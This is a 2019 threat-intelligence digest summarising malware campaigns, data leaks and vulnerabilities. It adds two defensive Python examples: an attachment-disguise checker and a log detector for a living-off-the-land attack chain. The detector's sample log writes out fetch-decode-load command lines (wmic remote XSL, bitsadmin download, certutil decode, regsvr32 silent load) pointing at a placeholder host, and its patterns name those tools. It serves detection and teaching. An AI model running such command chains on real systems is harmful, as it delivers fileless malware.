Threat Reports

Silobreaker Daily Cyber Digest – 09 July 2019



New campaign delivers RMS RAT alongside Dridex banking malware

  • Cofense researchers discovered a new email campaign impersonating eFax that appears to contain a Microsoft Word attachment. The attachment is actually a ZIP archive containing an XLS Microsoft Excel spreadsheet that includes an Office macro.
  • Enabling the Office macro causes Dridex banking malware and RMS RAT to be downloaded onto the target’s device. RMS RAT allows a malicious actor to log keystrokes, record from the webcam and microphone, transfer files, manipulate Windows Task Manager, and more.
  • Dridex is calibrated to target a wide range of sites; when the target visits one of these sites the malware injects a script into the browser. This allows an attacker to steal entered information, redirect traffic, bypass multi-factor authentication, and more.

Source (Includes IOCs)
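
The disguise described in this item (a ZIP that presents itself as a Word attachment and carries a macro-capable XLS) can be caught at the mail gateway by comparing an attachment's real container format with the extension it claims and by looking inside archives for Office files. The following Python is an added example written for this digest, not code from Silobreaker or Cofense; the attachment it inspects is constructed in memory, and the extension-to-container table is an assumption covering only the common Office formats.

```python
"""Check that an attachment's real container matches the extension it claims,
and look inside archives for Office files able to carry macros.

Added example, not code from Silobreaker or Cofense. The sample attachment is
constructed in memory: a ZIP named as a Word document that holds a legacy
.xls (OLE container), the disguise the report describes.
"""
import io
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # legacy .doc/.xls/.ppt container
ZIP_MAGIC = b"PK\x03\x04"                         # ZIP, also .docx/.xlsx (OOXML)

# Extension -> container the extension should map to (assumed table).
EXPECTED = {"doc": "ole", "xls": "ole", "docx": "zip", "xlsx": "zip", "zip": "zip"}
LEGACY_OFFICE = (".doc", ".xls", ".ppt")


def sniff(data: bytes) -> str:
    """Identify the container by its magic bytes, ignoring the file name."""
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def inspect_attachment(filename: str, data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = sniff(data)
    if ext in EXPECTED and EXPECTED[ext] != kind:
        findings.append(f"extension .{ext} claims {EXPECTED[ext]} but content is {kind}")
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                low = name.lower()
                # OOXML keeps VBA in vbaProject.bin; its presence means a macro exists.
                if low.endswith("vbaproject.bin"):
                    findings.append(f"macro container {name} inside archive")
                elif low.endswith(LEGACY_OFFICE) and sniff(zf.read(name)) == "ole":
                    # Legacy OLE files need an OLE parser to confirm a VBA stream;
                    # here they are only flagged as macro-capable.
                    findings.append(f"legacy Office file {name} inside archive (macro-capable)")
    return findings


def build_sample() -> bytes:
    """Constructed lure: a ZIP whose only member is a fake legacy .xls."""
    fake_xls = OLE_MAGIC + b"\x00" * 504  # header magic followed by padding
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("fax_message.xls", fake_xls)
    return buf.getvalue()


if __name__ == "__main__":
    for line in inspect_attachment("eFax_document.doc", build_sample()):
        print("!", line)
```

Confirming that a legacy .xls actually contains a VBA project requires parsing the OLE streams (a library such as oletools does this); the check above stops at flagging the mismatch and the macro-capable member, which is enough to quarantine for closer inspection.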


Fileless attack chain used to deliver Astaroth backdoor

  • The Microsoft Defender ATP Research Team discovered the attack being disseminated by spear-phishing emails that contain a LNK file. When opened, the LNK file executes the WMIC tool with the ‘Format’ parameter. This causes the download and execution of JavaScript code which proceeds to abuse the Bitsadmin tool to download payloads encoded in Base64, which are then decoded using the Certutil tool.
  • The Regsvr32 tool is then utilised to load the decoded DLLs, which decrypt and load additional files until the Astaroth backdoor is eventually injected into the Userinit process. The researchers stressed that the attack chain only uses legitimate system tools that are already present on the targeted device, which helps obfuscate the attack.
  • Astaroth malware is used to steal information and can exfiltrate users’ credentials, keystrokes, and more.

Source (Includes IOCs)
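
Because every stage of this chain runs a legitimate Windows binary, detection has to key on the sequence of unusual command lines rather than on any one tool. The Python below is an added example written for this digest, not code from Silobreaker or the Microsoft Defender ATP team: it reads constructed process-creation events in a simplified `timestamp|host|parent|image|commandline` format (an assumption standing in for Sysmon Event ID 1 or Windows 4688 records) and flags a host only when several distinct stages of the WMIC, Bitsadmin, Certutil and Regsvr32 sequence appear. The regexes are heuristics written for the example, not the researchers' own signatures.

```python
"""Flag the living-off-the-land tool sequence described above in process logs.

Added example, not code from Silobreaker or the Microsoft Defender ATP team.
Assumptions: process-creation events are supplied as constructed lines in a
simplified 'timestamp|host|parent|image|commandline' format standing in for
Sysmon Event ID 1 or Windows 4688 records; the regexes are heuristics written
for this example, not the researchers' own signatures.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


# (stage name, executable basename, pattern over the command line), one per
# stage the report names: WMIC /format, bitsadmin download, certutil decode,
# regsvr32 DLL load.
RULES = [
    ("wmic_format_remote", "wmic.exe",
     re.compile(r'/format\s*:\s*"?(https?://|\\\\|\S+\.xsl)', re.I)),
    ("bitsadmin_download", "bitsadmin.exe",
     re.compile(r"/transfer\b|/addfile\b", re.I)),
    ("certutil_decode", "certutil.exe",
     re.compile(r"-decode\b|-urlcache\b", re.I)),
    ("regsvr32_silent_load", "regsvr32.exe",
     re.compile(r"/s\b|/i:", re.I)),
]


def parse_line(line: str) -> ProcEvent:
    ts, host, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(ts, host, parent, image, cmdline)


def match_rules(ev: ProcEvent) -> list:
    """Names of every stage rule this single event satisfies."""
    exe = ev.image.rsplit("\\", 1)[-1].lower()
    return [name for name, image, pat in RULES
            if exe == image and pat.search(ev.cmdline)]


def detect_chain(lines, min_stages: int = 3) -> dict:
    """Group stage hits per host; a host that reaches at least `min_stages`
    distinct stages is returned as host -> [(timestamp, stage), ...].
    A lone certutil or regsvr32 call is normal admin activity, so a single
    hit is deliberately not enough."""
    hits = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        for stage in match_rules(ev):
            hits[ev.host].append((ev.ts, stage))
    return {host: sorted(v)
            for host, v in hits.items()
            if len({stage for _, stage in v}) >= min_stages}


# Constructed sample log: WS01 shows the whole chain, WS02 benign tool use.
SAMPLE = [
    '2019-07-09T10:01:02|WS01|explorer.exe|C:\\Windows\\System32\\wbem\\wmic.exe|wmic os get /format:"https://example.invalid/v.xsl"',
    "2019-07-09T10:01:05|WS01|wmic.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer j /download https://example.invalid/p.b64 C:\\Users\\Public\\p.b64",
    "2019-07-09T10:01:07|WS01|wmic.exe|C:\\Windows\\System32\\certutil.exe|certutil -decode C:\\Users\\Public\\p.b64 C:\\Users\\Public\\p.dll",
    "2019-07-09T10:01:09|WS01|wmic.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32 /s C:\\Users\\Public\\p.dll",
    "2019-07-09T10:05:00|WS02|cmd.exe|C:\\Windows\\System32\\certutil.exe|certutil -hashfile C:\\tools\\setup.msi SHA256",
    "2019-07-09T10:06:00|WS02|cmd.exe|C:\\Windows\\System32\\regsvr32.exe|regsvr32 /u C:\\Program Files\\App\\legacy.dll",
]

if __name__ == "__main__":
    for host, stages in detect_chain(SAMPLE).items():
        print(host, "->", [s for _, s in stages])
```

The threshold of three distinct stages is the design choice to tune: lowering it to one turns every `certutil -decode` into an alert, while the full four-stage match is brittle if the actor swaps one tool. In a real pipeline the grouping key would also include a time window and the parent-process relationship, both of which the sample records already carry.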


South Korean users targeted with specially customised GoBot2 variant

  • Researchers at ESET discovered the new malware variant, named GoBotKR, being spread via South Korean and Chinese torrent sites that host Korean movies, TV shows, and games. The researchers detected that the malware has been active since March 2018, with 80% of infections occurring in South Korea.
  • GoBotKR malware is written in Golang and is a variant of GoBot2 malware. The threat actors behind GoBotKR are using the malware to build a botnet that can be used in DDoS attacks. During the infection process GoBotKR relays material to the C2 which includes system information, network configuration, OS version information, a list of installed antivirus protection, and more.
  • In addition to normal GoBot2 features, GoBotKR contains modifications specifically designed for use in South Korea. Such techniques include scanning for the URLs of South Korean platforms Naver and Daum to determine IP addresses, and scanning for South Korean security software designed by AhnLab.

Source (Includes IOCs)


Over 17,000 new samples of Anubis malware discovered

  • Anubis malware, originally used for cyberespionage, has been retooled multiple times, for example as a banking malware or ransomware. Whilst researching Anubis’ activities, researchers at Trend Micro came across two related servers that contained 17,490 samples of the malware targeting a total of 188 banking and finance related apps, mainly in European countries, Turkey, Australia, the US and India.
  • In January 2019, Trend Micro observed Anubis stealing personally identifiable information by making use of motion-based sensors to elude sandbox analysis and overlays, a method that is also used in these new variants.
  • The researchers also discovered that the operators have been using social media platforms and Google short links to send commands since 2014, with one of the accounts’ registration dates suggesting the attacker has most likely been active for about twelve years.

Source (Includes IOCs)


Ongoing Campaigns

Zeus Panda observed employing new tactic targeting wealthy victims

  • Zeus Panda is a banking trojan known for targeting Italian users that loads webinjects when a victim visits and successfully logs into their online banking accounts.
  • Security researchers at Cofense recently detected the employment of a new tactic, in which the malware is also able to access accounts with multi-factor authentication enabled. Once the funds have been transferred, the malware hides any evidence of the transaction, ensuring that affluent victims are less likely to notice.

Source (Includes IOCs)


Phishing campaign mimics Italian manufacturer to deliver highly evasive malware

  • Researchers at Yoroi analysed the campaign, which used an ISO file attachment to deliver an encrypted Delphi packer. Researchers stressed the evasive nature of the malware, as evidenced by the ‘huge number’ of checks that it runs to determine if it is running in a lab environment or virtual machine.
  • These evasion techniques included running debugger checks, monitoring cursor movement, checking for words like ‘sandbox’, ‘malware’ and ‘sample’, and running CPUID instructions to try and obtain information about the processor and its features.
  • If all these checks are passed, the packer delivers the XpertRAT malware, which has capabilities such as keylogging, information exfiltration, command execution, and more.



Hacker Groups

Researcher investigates criminals behind GandCrab ransomware

  • Brian Krebs suggested that he had identified a Russian man who appears to have been in charge of recruiting new members to the GandCrab malware development team.
  • Krebs linked the highly rated Exploit forum user ‘Oneiillk2’ with an email address which had been used to register domains and sign up for accounts on the Russian social network Vkontakte. The researcher also found the email address linked to a phone number and a password which used a date of birth format.
  • The Vkontakte profile belonged to a Russian individual named ‘Igor Vladimirovich Prokopenko’. Using Russian citizenship records the researcher also discovered that the date of birth password matched Mr Prokopenko’s date of birth. Krebs reached out to Mr Prokopenko who declined multiple requests for comment.

Source (Includes IOCs)


Leaks and Breaches

Ontario municipality The Nation hit by ransomware attack

  • The municipality was hit with a ransomware attack on June 30th, 2019, that affected some of its services. Hackers are said to have demanded between $7,000 and $10,000 worth of Bitcoin, which the municipality refused to pay. All services apart from the municipality’s email service have been restored.



Jiangsu Provincial Public Security Department leaks over 90 million records

  • Security researcher Sanyam Jain discovered the data on two unsecured Elasticsearch servers. The database contained 58,364,777 citizen records and 33,708,010 business records.
  • Accessible personal information included names, genders and identity card numbers. Business records included business types, location coordinates and memos designed to track if the owner of the business is known.
  • Moreover, the servers also contained a Public Security Network admin console protected by a user/password combination and a publicly accessible Kibana installation. An intruder could have utilised these tools to browse and analyse the exposed data.



GE Aviation data exposed by DNS misconfiguration on open Jenkins server

  • Security researcher Bob Diachenko found a publicly exposed Jenkins server containing GE Aviation information such as source code, plaintext passwords, configuration details and private keys.
  • Diachenko reported the issue to GE Aviation who pulled the Jenkins server offline and stated that the information was exposed due to a DNS misconfiguration.



Data leak detected in Fieldwork’s software database

  • Cybersecurity researchers Noam Rotem and Ran Locar discovered a leak in a database belonging to Fieldwork, a business management platform. The breach was resolved shortly after detection.
  • A significant amount of exposed data was found, including customer names, addresses, phone numbers, email addresses, alarm codes, full credit card details, and more.
  • Most notably, an auto-login link giving direct access to a company’s backend system was also found, exposing sensitive client information and a large amount of the company’s administrative infrastructure.




Critical vulnerabilities found in Huawei’s web applications and servers

  • Security researchers at Swascan discovered multiple vulnerabilities within Huawei’s web applications ranked as critical that, if exploited, could impact ‘business continuity, user’s data, and information security and the regular operation of their services.’
  • The flaws belong to three CWE categories, namely CWE-119, CWE-125 and CWE-78.



Researchers analyse 12 critical vulnerabilities in industrial control system (ICS) products

  • Tenable Research detailed fifteen vulnerabilities the team found in the past nine months, twelve of which are classed as critical. The researchers suggest this indicates a lack of security standards in modern SCADA software.
  • The affected products are the Siemens TIA Portal, Fuji Electric TELLUS and V-Server, Schneider Electric InduSoft Web Studio and Modicon PLC, and Rockwell Automation RSLinx.
  • The researchers also offer a case study, in which they simulate an ICS attack on a nuclear power plant, demonstrating the impact such vulnerabilities could have on critical infrastructure systems.



RubyGem ‘strong password’ library contains backdoor

  • Developer Tute Costa found that the ‘strong password’ v.0.07 Ruby library had been taken over by a malicious actor. The hacker added code capable of downloading a payload from Pastebin which created a backdoor in websites and apps that used the ‘strong-password’ library.
  • Sites that were infected had their URL sent to the attacker’s address to await further instructions via cookie files. These were then unpacked and run through an execute function, granting the hacker the ability to run code inside an app with the backdoor.
  • Costa notified the RubyGems security team who then secured the library. The vulnerability is being tracked as CVE-2019-13354.

Source 1  Source 2 (Includes IOCs)


Unpatched Zero-Day vulnerability in Mac Zoom Client

  • A vulnerability in Mac Zoom Client, tracked as CVE-2019-13450, continues to allow malicious websites to access and enable the camera on a user’s device without permission due to a ‘quick-fix’ solution.
  • Security researcher Jonathan Leitschuh first contacted Zoom Video Communications about two vulnerabilities on March 8th, 2019, with the company releasing the patch on June 24th, 2019 with version 4.4.2. CVE-2019-13449, which has been successfully patched in version 4.4.2, would have allowed an attacker to perform a Denial-of-Service attack. The patch did not fix the webcam vulnerability, as it can be easily bypassed according to Leitschuh.
  • Moreover, Leitschuh revealed that after uninstalling Zoom from a device, the localhost web server remains present, allowing it to reinstall the application without user authentication.



The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.
